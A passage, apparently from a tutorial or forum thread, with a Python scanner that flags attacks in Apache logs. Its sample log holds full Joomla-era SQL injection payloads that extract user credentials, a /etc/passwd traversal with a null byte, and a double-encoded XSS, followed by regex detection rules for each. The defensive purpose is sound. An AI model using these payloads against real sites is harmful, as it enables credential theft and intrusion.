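203.0.113.11 - - [15/Jan/2009:10:00:02 +0000] "GET /index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54 HTTP/1.1" 200 7300
203.0.113.12 - - [15/Jan/2009:10:00:03 +0000] "GET /administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1800
203.0.113.13 - - [15/Jan/2009:10:00:04 +0000] "GET /index.php?searchword=%253c%2573%2563%2572%2569%2570%2574%253ealert(1)%253c%252f%2573%2563%2572%2569%2570%2574%253e&option=com_search HTTP/1.1" 200 4100
203.0.113.14 - - [15/Jan/2009:10:00:05 +0000] "GET /index.php?option=com_eventing&catid=1+and+ascii(substring((select+username+from+jos_users+limit+0,1),3,1))%3E98-- HTTP/1.1" 200 6900
'''

# ip, method, request target (path + query) and status from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Every rule is matched against the fully decoded request target, so that
# "+"-as-space and percent-encoding cannot hide the keywords.
RULES = {
    "sqli_union":    re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sqli_blind":    re.compile(r"\bascii\s*\(\s*substring\s*\(", re.I),
    "joomla_users":  re.compile(r"\bjos_users\b", re.I),   # Joomla 1.x default table prefix
    "lfi_traversal": re.compile(r"(?:\.\./){2,}"),
    "lfi_globals":   re.compile(r"(?:GLOBALS\[)?mosConfig_absolute_path\]?=", re.I),
    "xss_script_tag": re.compile(
        r"<\s*script\b|\bon(?:click|load|error|mouseover)\s*=", re.I
    ),
}


def decode_fully(target, max_rounds=4):
    """Undo repeated URL-encoding until the string stops changing.

    Returns (decoded, rounds). The com_search payload in this thread is
    double-encoded, so a single unquote would leave it unmatched.
    """
    current, rounds = target, 0
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def classify(target):
    """Return the set of rule names that fire on one request target."""
    decoded, rounds = decode_fully(target)
    hits = {name for name, rx in RULES.items() if rx.search(decoded)}
    if "\x00" in decoded:
        hits.add("null_byte")        # %00 truncation used with the include() paths
    if rounds >= 2:
        hits.add("double_encoded")   # nested encoding is itself a signal
    return hits


def scan_log(text):
    """Parse combined-log lines; return (ip, target, tags) for suspicious ones."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if tags:
            findings.append((m.group("ip"), m.group("target"), tags))
    return findings


if __name__ == "__main__":
    for ip, target, tags in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {','.join(sorted(tags)):32} {target[:70]}")
```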